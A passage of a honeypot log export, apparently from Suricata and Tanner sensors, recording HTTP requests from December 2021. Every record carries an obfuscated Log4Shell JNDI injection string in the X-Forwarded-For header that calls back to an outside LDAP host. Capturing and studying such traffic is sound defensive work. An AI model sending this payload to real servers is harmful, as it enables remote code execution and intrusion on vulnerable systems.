bits/pixel, 32x32, 32 bits/pixel"",""gaps"":false,""state"":""CLOSED"",""md5"":""cf2445dcb53a031c02f9b57e2199bc03"",""stored"":false,""size"":5430,""tx_id"":2}}",,,,,,,,,,,,,,,TCP,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"172.16.0.42",80,,,,,,,,,,,,obviousweakness,"172.16.0.42","172.16.0.42","[""suricata"",""beats_input_codec_plain_applied""]",,,,"2021-12-15T07:10:38.518796+0000",,,,,,,,,Suricata,,,,
"2021-12-15T07:10:38.384Z",1,IX7tvH0B6VkG8jKzyruR,"logstash-tanner-2021.12.15",,"_doc","8c59388c-86e3-4c99-b68f-f2d35c273de2",d5c7664ccd81,"1d24883e-6806-47e2-a24f-db80cd70e61d",d5c7664ccd81,filebeat,"7.11.1",,,,,,,,,,,,,,,,,,,,,"ca11b8a9-809a-43ae-ad92-8dcfb24b07ec",,80,,,"1.6.0",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,NA,US,US,"United States",,"157.245.42.12","37.751","{""lon"":-97.822,""lat"":37.751}","-97.822",,,,"America/Chicago",,,,"*/*","gzip, deflate",,,"keep-alive","sess_uuid=ca11b8a9-809a-43ae-ad92-8dcfb24b07ec",,"172.16.0.42",,"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36","${jndi:${lower:l}${lower:d}a${lower:p}://xf.world80.log4j.bin${upper:a}ryedge.io:80/callback}",d5c7664ccd81,,,,,,,,,,,,,,,,,,,,,,,,log,,,,,,,,"/data/tanner/log/tanner_report.json",12933,,"{""method"": ""GET"", ""path"": ""/core/misc/favicon.ico"", ""headers"": {""host"": ""172.16.0.42"", ""user-agent"": ""Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36"", ""accept-encoding"": ""gzip, deflate"", ""accept"": ""*/*"", ""connection"": ""keep-alive"", ""x-forwarded-for"": ""${jndi:${lower:l}${lower:d}a${lower:p}://xf.world80.log4j.bin${upper:a}ryedge.io:80/callback}"", ""cookie"": ""sess_uuid=ca11b8a9-809a-43ae-ad92-8dcfb24b07ec""}, ""uuid"": ""07bceb1c-7e97-4d15-b5c2-447137a51f7d"", ""peer"": {""ip"": ""157.245.42.12"", ""port"": 46258}, ""status"": 200, ""cookies"": {""sess_uuid"": ""ca11b8a9-809a-43ae-ad92-8dcfb24b07ec""}, ""response_msg"": {""version"": ""0.6.0"", ""response"": {""message"": {""detection"": {""name"": ""index"", ""order"": 1, ""type"": 1, ""version"": ""0.6.0""}, ""sess_uuid"": ""51acb18a-ac1c-42a3-84da-c9819f86847a""}}}, ""timestamp"": ""2021-12-15T07:10:38.384526""}",,,,,,GET,,,,,,"/core/misc/favicon.ico",,,,,,,,,,,index,1,1,"0.6.0","51acb18a-ac1c-42a3-84da-c9819f86847a","0.6.0",,,,,,,,,,,,,,,,,,"157.245.42.12",46258,,,,,,,,,200,,,obviousweakness,"172.16.0.42","172.16.0.42","[""tanner"",""beats_input_codec_plain_applied"",""_geoip_lookup_failure""]",,,,"2021-12-15T07:10:38.384526",,,,,,,,,Tanner,,,"07bceb1c-7e97-4d15-b5c2-447137a51f7d",
"2021-12-15T07:10:38.258Z",1,wLDtvH0BCXMCNTQLylh5,"logstash-suricata-2021.12.15",,"_doc","8c59388c-86e3-4c99-b68f-f2d35c273de2",d5c7664ccd81,"1d24883e-6806-47e2-a24f-db80cd70e61d",d5c7664ccd81,filebeat,"7.11.1",,,,,,,,,,,,,,,,,,,,,,"172.16.0.42",80,,,"1.6.0",,http,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,28658520361475,,,,NA,US,US,"United States",,"157.245.42.12","37.751","{""lon"":-97.822,""lat"":37.751}","-97.822",,,,"America/Chicago",,,,,,,,,,,,,,,d5c7664ccd81,"gzip, deflate",,,,"172.16.0.42","text/html",GET,,,,,,,"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36",6957,"HTTP/1.1",404,"/favicon.ico",,"${jndi:${lower:l}${lower:d}a${lower:p}://xf.world80.log4j.bin${upper:a}ryedge.io:80/callback}",,,eth0,log,,,,,,,,"/data/suricata/log/eve.json",28630378,,"{""timestamp"":""2021-12-15T07:10:38.258567+0000"",""flow_id"":28658520361475,""in_iface"":""eth0"",""event_type"":""http"",""src_ip"":""157.245.42.12"",""src_port"":46258,""dest_ip"":""172.16.0.42"",""dest_port"":80,""proto"":""TCP"",""tx_id"":1,""http"":{""hostname"":""172.16.0.42"",""url"":""/favicon.ico"",""http_user_agent"":""Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36"",""xff"":""${jndi:${lower:l}${lower:d}a${lower:p}://xf.world80.log4j.bin${upper:a}ryedge.io:80/callback}"",""http_content_type"":""text/html"",""accept_encoding"":""gzip, deflate"",""http_method"":""GET"",""protocol"":""HTTP/1.1"",""status"":404,""length"":6957}}",,,,,,,,,,,,,,,TCP,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"157.245.42.12",46258,,,,,,,,,,,,obviousweakness,"172.16.0.42","172.16.0.42","[""suricata"",""beats_input_codec_plain_applied"",""_geoip_lookup_failure""]",,,,"2021-12-15T07:10:38.258567+0000",,,,,,,,1,Suricata,,,,
"2021-12-15T07:10:38.258Z",1,wbDtvH0BCXMCNTQLylh5,"logstash-suricata-2021.12.15",,"_doc","8c59388c-86e3-4c99-b68f-f2d35c273de2",d5c7664ccd81,"1d24883e-6806-47e2-a24f-db80cd70e61d",d5c7664ccd81,filebeat,"7.11.1",,,,,,,,,,,,,,,,http,,,,,,"157.245.42.12",46258,,,"1.6.0",,fileinfo,,,,,,,,,,,,,,,,,,,,,,,"/favicon.ico",false,"HTML document, ASCII text, with very long lines (399)",ee21e3221e5b9336c5fff029b2cef274,"[]",6957,CLOSED,false,1,,,,,,,28658520361475,"The Procter and Gamble Company",11003,,NA,US,US,"United States",,"172.16.0.42","37.751","{""lon"":-97.822,""lat"":37.751}","-97.822",,,,"America/Chicago",,,,,,,,,,,,,,,d5c7664ccd81,,,,,"172.16.0.42","text/html",GET,,,,,,,"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36",6957,"HTTP/1.1",404,"/favicon.ico",,"${jndi:${lower:l}${lower:d}a${lower:p}://xf.world80.log4j.bin${upper:a}ryedge.io:80/callback}",,,eth0,log,,,,,,,,"/data/suricata/log/eve.json",28631027,,"{""timestamp"":""2021-12-15T07:10:38.258567+0000"",""flow_id"":28658520361475,""in_iface"":""eth0"",""event_type"":""fileinfo"",""src_ip"":""172.16.0.42"",""src_port"":80,""dest_ip"":""157.245.42.12"",""dest_port"":46258,""proto"":""TCP"",""http"":{""hostname"":""172.16.0.42"",""url"":""/favicon.ico"",""http_user_agent"":""Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36"",""xff"":""${jndi:${lower:l}${lower:d}a${lower:p}://xf.world80.log4j.bin${upper:a}ryedge.io:80/callback}"",""http_content_type"":""text/html"",""http_method"":""GET"",""protocol"":""HTTP/1.1"",""status"":404,""length"":6957},""app_proto"":""http"",""fileinfo"":{""filename"":""/favicon.ico"",""sid"":[],""magic"":""HTML document, ASCII text, with very long lines (399)"",""gaps"":false,""state"":""CLOSED"",""md5"":""ee21e3221e5b9336c5fff029b2cef274"",""stored"":false,""size"":6957,""tx_id"":1}}",,,,,,,,,,,,,,,TCP,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"172.16.0.42",80,,,,,,,,,,,,obviousweakness,"172.16.0.42","172.16.0.42","[""suricata"",""beats_input_codec_plain_applied""]",,,,"2021-12-15T07:10:38.258567+0000",,,,,,,,,Suricata,,,,
"2021-12-15T07:10:38.123Z",1,IH7tvH0B6VkG8jKzyruR,"logstash-tanner-2021.12.15",,"_doc","8c59388c-86e3-4c99-b68f-f2d35c273de2",d5c7664ccd81,"1d24883e-6806-47e2-a24f-db80cd70e61d",d5c7664ccd81,filebeat,"7.11.1",,,,,,,,,,,,,,,,,,,,,"ca11b8a9-809a-43ae-ad92-8dcfb24b07ec",,80,,,"1.6.0",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,NA,US,US,"United States",,"157.245.42.12","37.751","{""lon"":-97.822,""lat"":37.751}","-97.822",,,,"America/Chicago",,,,"*/*","gzip, deflate",,,"keep-alive","sess_uuid=ca11b8a9-809a-43ae-ad92-8dcfb24b07ec",,"172.16.0.42",,"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36","${jndi:${lower:l}${lower:d}a${lower:p}://xf.world80.log4j.bin${upper:a}ryedge.io:80/callback}",d5c7664ccd81,,,,,,,,,,,,,,,,,,,,,,,,log,,,,,,,,"/data/tanner/log/tanner_report.json",12050,,"{""method"": ""GET"", ""path"": ""/favicon.ico"", ""headers"": {""host"": ""172.16.0.42"", ""user-agent"": ""Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36"", ""accept-encoding"": ""gzip, deflate"", ""accept"": ""*/*"", ""connection"": ""keep-alive"", ""x-forwarded-for"": ""${jndi:${lower:l}${lower:d}a${lower:p}://xf.world80.log4j.bin${upper:a}ryedge.io:80/callback}"", ""cookie"": ""sess_uuid=ca11b8a9-809a-43ae-ad92-8dcfb24b07ec""}, ""uuid"": ""07bceb1c-7e97-4d15-b5c2-447137a51f7d"", ""peer"": {""ip"": ""157.245.42.12"", ""port"": 46258}, ""status"": 200, ""cookies"": {""sess_uuid"": ""ca11b8a9-809a-43ae-ad92-8dcfb24b07ec""}, ""response_msg"": {""version"": ""0.6.0"", ""response"": {""message"": {""detection"": {""name"": ""index"", ""order"": 1, ""type"": 1, ""version"": ""0.6.0""}, ""sess_uuid"": ""51acb18a-ac1c-42a3-84da-c9819f86847a""}}}, ""timestamp"": ""2021-12-15T07:10:38.123551""}",,,,,,GET,,,,,,"/favicon.ico",,,,,,,,,,,index,1,1,"0.6.0","51acb18a-ac1c-42a3-84da-c9819f86847a","0.6.0",,,,,,,,,,,,,,,,,,"157.245.42.12",46258,,,,,,,,,200,,,obviousweakness,"172.16.0.42","172.16.0.42","[""tanner"",""beats_input_codec_plain_applied"",""_geoip_lookup_failure""]",,,,"2021-12-15T07:10:38.123551",,,,,,,,,Tanner,,,"07bceb1c-7e97-4d15-b5c2-447137a51f7d",
"2021-12-15T07:10:37.420Z",1,nrDtvH0BCXMCNTQLxliK,"logstash-suricata-2021.12.15",,"_doc","8c59388c-86e3-4c99-b68f-f2d35c273de2",d5c7664ccd81,"1d24883e-6806-47e2-a24f-db80cd70e61d",d5c7664ccd81,filebeat,"7.11.1",,,,,,,,,,,,,,,,,,,,,,"172.16.0.42",80,,,"1.6.0",,http,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,28658520361475,,,,NA,US,US,"United States",,"157.245.42.12","37.751","{""lon"":-97.822,""lat"":37.751}","-97.822",,,,"America/Chicago",,,,,,,,,,,,,,,d5c7664ccd81,"gzip, deflate",,,,"172.16.0.42","text/html",GET,,,,,,,"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36",7554,"HTTP/1.1",200,"/",,"${jndi:${lower:l}${lower:d}a${lower:p}://xf.world80.log4j.bin${upper:a}ryedge.io:80/callback}",,,eth0,log,,,,,,,,"/data/suricata/log/eve.json",28627523,,"{""timestamp"":""2021-12-15T07:10:37.420125+0000"",""flow_id"":28658520361475,""in_iface"":""eth0"",""event_type"":""http"",""src_ip"":""157.245.42.12"",""src_port"":46258,""dest_ip"":""172.16.0.42"",""dest_port"":80,""proto"":""TCP"",""tx_id"":0,""http"":{""hostname"":""172.16.0.42"",""url"":""/"",""http_user_agent"":""Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36"",""xff"":""${jndi:${lower:l}${lower:d}a${lower:p}://xf.world80.log4j.bin${upper:a}ryedge.io:80/callback}"",""http_content_type"":""text/html"",""accept_encoding"":""gzip, deflate"",""http_method"":""GET"",""protocol"":""HTTP/1.1"",""status"":200,""length"":7554}}",,,,,,,,,,,,,,,TCP,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"157.245.42.12",46258,,,,,,,,,,,,obviousweakness,"172.16.0.42","172.16.0.42","[""suricata"",""beats_input_codec_plain_applied"",""_geoip_lookup_failure""]",,,,"2021-12-15T07:10:37.420125+0000",,,,,,,,0,Suricata,,,,
"2021-12-15T07:10:37.420Z",1,Dn7tvH0B6VkG8jKzxruL,"logstash-suricata-2021.12.15",,"_doc","8c59388c-86e3-4c99-b68f-f2d35c273de2",d5c7664ccd81,"1d24883e-6806-47e2-a24f-db80cd70e61d",d5c7664ccd81,filebeat,"7.11.1",,,,,,,,,,,,,,,,http,,,,,,"157.245.42.12",46258,,,"1.6.0",,fileinfo,,,,,,,,,,,,,,,,,,,,,,,"/",false,"HTML document, Unicode text, UTF-8 text, with very long lines (399)",22b7d884d99be8e15fc3b1b27008c681,"[]",7554,CLOSED,false,0,,,,,,,28658520361475,"The Procter and Gamble Company",11003,,NA,US,US,"United States",,"172.16.0.42","37.751","{""lon"":-97.822,""lat"":37.751}","-97.822",,,,"America/Chicago",,,,,,,,,,,,,,,d5c7664ccd81,,,,,"172.16.0.42","text/html",GET,,,,,,,"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36",7554,"HTTP/1.1",200,"/",,"${jndi:${lower:l}${lower:d}a${lower:p}://xf.world80.log4j.bin${upper:a}ryedge.io:80/callback}",,,eth0,log,,,,,,,,"/data/suricata/log/eve.json",28628161,,"{""timestamp"":""2021-12-15T07:10:37.420125+0000"",""flow_id"":28658520361475,""in_iface"":""eth0"",""event_type"":""fileinfo"",""src_ip"":""172.16.0.42"",""src_port"":80,""dest_ip"":""157.245.42.12"",""dest_port"":46258,""proto"":""TCP"",""http"":{""hostname"":""172.16.0.42"",""url"":""/"",""http_user_agent"":""Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36"",""xff"":""${jndi:${lower:l}${lower:d}a${lower:p}://xf.world80.log4j.bin${upper:a}ryedge.io:80/callback}"",""http_content_type"":""text/html"",""http_method"":""GET"",""protocol"":""HTTP/1.1"",""status"":200,""length"":7554},""app_proto"":""http"",""fileinfo"":{""filename"":""/"",""sid"":[],""magic"":""HTML document, Unicode text, UTF-8 text, with very long lines (399)"",""gaps"":false,""state"":""CLOSED"",""md5"":""22b7d884d99be8e15fc3b1b27008c681"",""stored"":false,""size"":7554,""tx_id"":0}}",,,,,,,,,,,,,,,TCP,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"172.16.0.42",80,,,,,,,,,,,,obviousweakness,"172.16.0.42","172.16.0.42","[""suricata"",""beats_input_codec_plain_applied""]",,,,"2021-12-15T07:10:37.420125+0000",,,,,,,,,Suricata,,,,
"2021-12-15T07:10:37.205Z",1,H37tvH0B6VkG8jKzyruR,"logstash-tanner-2021.12.15",,"_doc","8c59388c-86e3-4c99-b68f-f2d35c273de2",d5c7664ccd81,"1d24883e-6806-47e2-a24f-db80cd70e61d",d5c7664ccd81,filebeat,"7.11.1",,,,,,,,,,,,,,,,,,,,,,,80,,,"1.6.0",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,NA,US,US,"United States",,"157.245.42.12","37.751","{""lon"":-97.822,""lat"":37.751}","-97.822",,,,"America/Chicago",,,,"*/*","gzip, deflate",,,"keep-alive",,,"172.16.0.42",,"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36","${jndi:${lower:l}${lower:d}a${lower:p}://xf.world80.log4j.bin${upper:a}ryedge.io:80/callback}",d5c7664ccd81,,,,,,,,,,,,,,,,,,,,,,,,log,,,,,,,,"/data/tanner/log/tanner_report.json",11272,,"{""method"": ""GET"", ""path"": ""/"", ""headers"": {""host"": ""172.16.0.42"", ""user-agent"": ""Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36"", ""accept-encoding"": ""gzip, deflate"", ""accept"": ""*/*"", ""connection"": ""keep-alive"", ""x-forwarded-for"": ""${jndi:${lower:l}${lower:d}a${lower:p}://xf.world80.log4j.bin${upper:a}ryedge.io:80/callback}""}, ""uuid"": ""07bceb1c-7e97-4d15-b5c2-447137a51f7d"", ""peer"": {""ip"": ""157.245.42.12"", ""port"": 46258}, ""status"": 200, ""cookies"": {""sess_uuid"": null}, ""response_msg"": {""version"": ""0.6.0"", ""response"": {""message"": {""detection"": {""name"": ""index"", ""order"": 1, ""type"": 1, ""version"": ""0.6.0""}, ""sess_uuid"": ""ca11b8a9-809a-43ae-ad92-8dcfb24b07ec""}}}, ""timestamp"": ""2021-12-15T07:10:37.205236""}",,,,,,GET,,,,,,"/",,,,,,,,,,,index,1,1,"0.6.0","ca11b8a9-809a-43ae-ad92-8dcfb24b07ec","0.6.0",,,,,,,,,,,,,,,,,,"157.245.42.12",46258,,,,,,,,,200,,,obviousweakness,"172.16.0.42","172.16.0.42","[""tanner"",""beats_input_codec_plain_applied"",""_geoip_lookup_failure""]",,,,"2021-12-15T07:10:37.205236",,,,,,,,,Tanner,,,"07bceb1c-7e97-4d15-b5c2-447137a51f7d",
"2021-12-15T06:23:38.416Z",1,v33CvH0B6VkG8jKzxAJB,"logstash-suricata-2021.12.15",,"_doc","ce9644ba-4407-4790-a216-9ed605f3b1d6",6774e89ff91d,"ce444089-8950-47de-880d-7e01a7e0c213",6774e89ff91d,filebeat,"7.11.1",,,,,,,,,,,,,,,,,,,,,,"172.16.0.42",80,,,"1.6.0",,http,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,2189709785161211,"The Procter and Gamble Company",11003,,NA,US,US,"United States",,"137.184.105.192","37.751","{""lon"":-97.822,""lat"":37.751}","-97.822",,,,"America/Chicago",,,,,,,,,,,,,,,6774e89ff91d,"gzip, deflate",,,,"172.16.0.42","image/x-icon",GET,,,,,,,"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36",34494,"HTTP/1.1",200,"/favicon.ico",,"${jndi:${lower:l}${lower:d}a${lower:p}://xf.world80.log4j.bin${upper:a}ryedge.io:80/callback}",,,eth0,log,,,,,,,,"/data/suricata/log/eve.json",9474990,,"{""timestamp"":""2021-12-15T06:23:38.416718+0000"",""flow_id"":2189709785161211,""in_iface"":""eth0"",""event_type"":""http"",""src_ip"":""137.184.105.192"",""src_port"":48384,""dest_ip"":""172.16.0.42"",""dest_port"":80,""proto"":""TCP"",""tx_id"":1,""http"":{""hostname"":""172.16.0.42"",""url"":""/favicon.ico"",""http_user_agent"":""Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36"",""xff"":""${jndi:${lower:l}${lower:d}a${lower:p}://xf.world80.log4j.bin${upper:a}ryedge.io:80/callback}"",""http_content_type"":""image/x-icon"",""accept_encoding"":""gzip, deflate"",""http_method"":""GET"",""protocol"":""HTTP/1.1"",""status"":200,""length"":34494}}",,,,,,,,,,,,,,,TCP,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"137.184.105.192",48384,,,,,,,,,,,,fortunateworkhorse,"172.16.0.42","172.16.0.42","[""suricata"",""beats_input_codec_plain_applied""]",,,,"2021-12-15T06:23:38.416718+0000",,,,,,,,1,Suricata,,,,
"2021-12-15T06:23:38.416Z",1,hK7CvH0BCXMCNTQLxJ9A,"logstash-suricata-2021.12.15",,"_doc","ce9644ba-4407-4790-a216-9ed605f3b1d6",6774e89ff91d,"ce444089-8950-47de-880d-7e01a7e0c213",6774e89ff91d,filebeat,"7.11.1",,,,,,,,,,,,,,,,http,,,,,,"137.184.105.192",48384,,,"1.6.0",,fileinfo,,,,,,,,,,,,,,,,,,,,,,,"/favicon.ico",false,"MS Windows icon resource - 5 icons, 16x16, 32 bits/pixel, 24x24, 32 bits/pixel",36e47e74810a0d8c32a77f495c49cf8e,"[]",34494,CLOSED,false,1,,,,,,,2189709785161211,,,,AS,SG,SG,Singapore,,"172.16.0.42","1.314","{""lon"":103.6839,""lat"":1.314}","103.6839",62,,,"Asia/Singapore",,,,,,,,,,,,,,,6774e89ff91d,,,,,"172.16.0.42","image/x-icon",GET,,,,,,,"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36",34494,"HTTP/1.1",200,"/favicon.ico",,"${jndi:${lower:l}${lower:d}a${lower:p}://xf.world80.log4j.bin${upper:a}ryedge.io:80/callback}",,,eth0,log,,,,,,,,"/data/suricata/log/eve.json",9475645,,"{""timestamp"":""2021-12-15T06:23:38.416718+0000"",""flow_id"":2189709785161211,""in_iface"":""eth0"",""event_type"":""fileinfo"",""src_ip"":""172.16.0.42"",""src_port"":80,""dest_ip"":""137.184.105.192"",""dest_port"":48384,""proto"":""TCP"",""http"":{""hostname"":""172.16.0.42"",""url"":""/favicon.ico"",""http_user_agent"":""Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36"",""xff"":""${jndi:${lower:l}${lower:d}a${lower:p}://xf.world80.log4j.bin${upper:a}ryedge.io:80/callback}"",""http_content_type"":""image/x-icon"",""http_method"":""GET"",""protocol"":""HTTP/1.1"",""status"":200,""length"":34494},""app_proto"":""http"",""fileinfo"":{""filename"":""/favicon.ico"",""sid"":[],""magic"":""MS Windows icon resource - 5 icons, 16x16, 32 bits/pixel, 24x24, 32 bits/pixel"",""gaps"":false,""state"":""CLOSED"",""md5"":""36e47e74810a0d8c32a77f495c49cf8e"",""stored"":false,""size"":34494,""tx_id"":1}}",,,,,,,,,,,,,,,TCP,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"172.16.0.42",80,,,,,,,,,,,,fortunateworkhorse,"172.16.0.42","172.16.0.42","[""suricata"",""beats_input_codec_plain_applied"",""_geoip_lookup_failure""]",,,,"2021-12-15T06:23:38.416718+0000",,,,,,,,,Suricata,,,,
"2021-12-15T06:23:37.912Z",1,MRrCvH0B5e7x5EYnv0wD,"logstash-tanner-2021.12.15",,"_doc","ce9644ba-4407-4790-a216-9ed605f3b1d6",6774e89ff91d,"ce444089-8950-47de-880d-7e01a7e0c213",6774e89ff91d,filebeat,"7.11.1",,,,,,,,,,,,,,,,,,,,,"6e35a4bc-d6a7-410d-a1ae-8ed8ecde665d",,80,,,"1.6.0",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"The Procter and Gamble Company",11003,,NA,US,US,"United States",,"137.184.105.192","37.751","{""lon"":-97.822,""lat"":37.751}","-97.822",,,,"America/Chicago",,,,"*/*","gzip, deflate",,,"keep-alive","sess_uuid=6e35a4bc-d6a7-410d-a1ae-8ed8ecde665d",,"172.16.0.42",,"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36","${jndi:${lower:l}${lower:d}a${lower:p}://xf.world80.log4j.bin${upper:a}ryedge.io:80/callback}",6774e89ff91d,,,,,,,,,,,,,,,,,,,,,,,,log,,,,,,,,"/data/tanner/log/tanner_report.json",6412,,"{""method"": ""GET"", ""path"": ""/favicon.ico"", ""headers"": {""host"": ""172.16.0.42"", ""user-agent"": ""Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36"", ""accept-encoding"": ""gzip, deflate"", ""accept"": ""*/*"", ""connection"": ""keep-alive"", ""x-forwarded-for"": ""${jndi:${lower:l}${lower:d}a${lower:p}://xf.world80.log4j.bin${upper:a}ryedge.io:80/callback}"", ""cookie"": ""sess_uuid=6e35a4bc-d6a7-410d-a1ae-8ed8ecde665d""}, ""uuid"": ""9a4723dc-b56d-45f3-890b-57900f4d44e9"", ""peer"": {""ip"": ""137.184.105.192"", ""port"": 48384}, ""status"": 200, ""cookies"": {""sess_uuid"": ""6e35a4bc-d6a7-410d-a1ae-8ed8ecde665d""}, ""response_msg"": {""version"": ""0.6.0"", ""response"": {""message"": {""detection"": {""name"": ""index"", ""order"": 1, ""type"": 1, ""version"": ""0.6.0""}, ""sess_uuid"": ""b8f640a9-dc66-43ea-b468-210a9786a0b0""}}}, ""timestamp"": ""2021-12-15T06:23:37.912469""}",,,,,,GET,,,,,,"/favicon.ico",,,,,,,,,,,index,1,1,"0.6.0","b8f640a9-dc66-43ea-b468-210a9786a0b0","0.6.0",,,,,,,,,,,,,,,,,,"137.184.105.192",48384,,,,,,,,,200,,,fortunateworkhorse,"172.16.0.42","172.16.0.42","[""tanner"",""beats_input_codec_plain_applied""]",,,,"2021-12-15T06:23:37.912469",,,,,,,,,Tanner,,,"9a4723dc-b56d-45f3-890b-57900f4d44e9",
"2021-12-15T06:23:36.821Z",1,Nn3CvH0B6VkG8jKzugKh,"logstash-suricata-2021.12.15",,"_doc","ce9644ba-4407-4790-a216-9ed605f3b1d6",6774e89ff91d,"ce444089-8950-47de-880d-7e01a7e0c213",6774e89ff91d,filebeat,"7.11.1",,,,,,,,,,,,,,,,,,,,,,"172.16.0.42",80,,,"1.6.0",,http,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,2189709785161211,"The Procter and Gamble Company",11003,,NA,US,US,"United States",,"137.184.105.192","37.751","{""lon"":-97.822,""lat"":37.751}","-97.822",,,,"America/Chicago",,,,,,,,,,,,,,,6774e89ff91d,"gzip, deflate",,,,"172.16.0.42","text/html",GET,,,,,,,"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36",16240,"HTTP/1.1",200,"/",,"${jndi:${lower:l}${lower:d}a${lower:p}://xf.world80.log4j.bin${upper:a}ryedge.io:80/callback}",,,eth0,log,,,,,,,,"/data/suricata/log/eve.json",9471508,,"{""timestamp"":""2021-12-15T06:23:36.821626+0000"",""flow_id"":2189709785161211,""in_iface"":""eth0"",""event_type"":""http"",""src_ip"":""137.184.105.192"",""src_port"":48384,""dest_ip"":""172.16.0.42"",""dest_port"":80,""proto"":""TCP"",""tx_id"":0,""http"":{""hostname"":""172.16.0.42"",""url"":""/"",""http_user_agent"":""Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36"",""xff"":""${jndi:${lower:l}${lower:d}a${lower:p}://xf.world80.log4j.bin${upper:a}ryedge.io:80/callback}"",""http_content_type"":""text/html"",""accept_encoding"":""gzip, deflate"",""http_method"":""GET"",""protocol"":""HTTP/1.1"",""status"":200,""length"":16240}}",,,,,,,,,,,,,,,TCP,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"137.184.105.192",48384,,,,,,,,,,,,fortunateworkhorse,"172.16.0.42","172.16.0.42","[""suricata"",""beats_input_codec_plain_applied""]",,,,"2021-12-15T06:23:36.821626+0000",,,,,,,,0,Suricata,,,,
"2021-12-15T06:23:36.821Z",1,AxrCvH0B5e7x5EYnukyi,"logstash-suricata-2021.12.15",,"_doc","ce9644ba-4407-4790-a216-9ed605f3b1d6",6774e89ff91d,"ce444089-8950-47de-880d-7e01a7e0c213",6774e89ff91d,filebeat,"7.11.1",,,,,,,,,,,,,,,,http,,,,,,"137.184.105.192",48384,,,"1.6.0",,fileinfo,,,,,,,,,,,,,,,,,,,,,,,"/",false,"HTML document, ASCII text, with very long lines (747)",f57e5b6f34eeacc1c32cb643fb59a98e,"[]",16240,CLOSED,false,0,,,,,,,2189709785161211,,,,AS,SG,SG,Singapore,,"172.16.0.42","1.314","{""lon"":103.6839,""lat"":1.314}","103.6839",62,,,"Asia/Singapore",,,,,,,,,,,,,,,6774e89ff91d,,,,,"172.16.0.42","text/html",GET,,,,,,,"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36",16240,"HTTP/1.1",200,"/",,"${jndi:${lower:l}${lower:d}a${lower:p}://xf.world80.log4j.bin${upper:a}ryedge.io:80/callback}",,,eth0,log,,,,,,,,"/data/suricata/log/eve.json",9472149,,"{""timestamp"":""2021-12-15T06:23:36.821626+0000"",""flow_id"":2189709785161211,""in_iface"":""eth0"",""event_type"":""fileinfo"",""src_ip"":""172.16.0.42"",""src_port"":80,""dest_ip"":""137.184.105.192"",""dest_port"":48384,""proto"":""TCP"",""http"":{""hostname"":""172.16.0.42"",""url"":""/"",""http_user_agent"":""Mozilla/5.0 (Windows NT 10.0; Win64; x64) 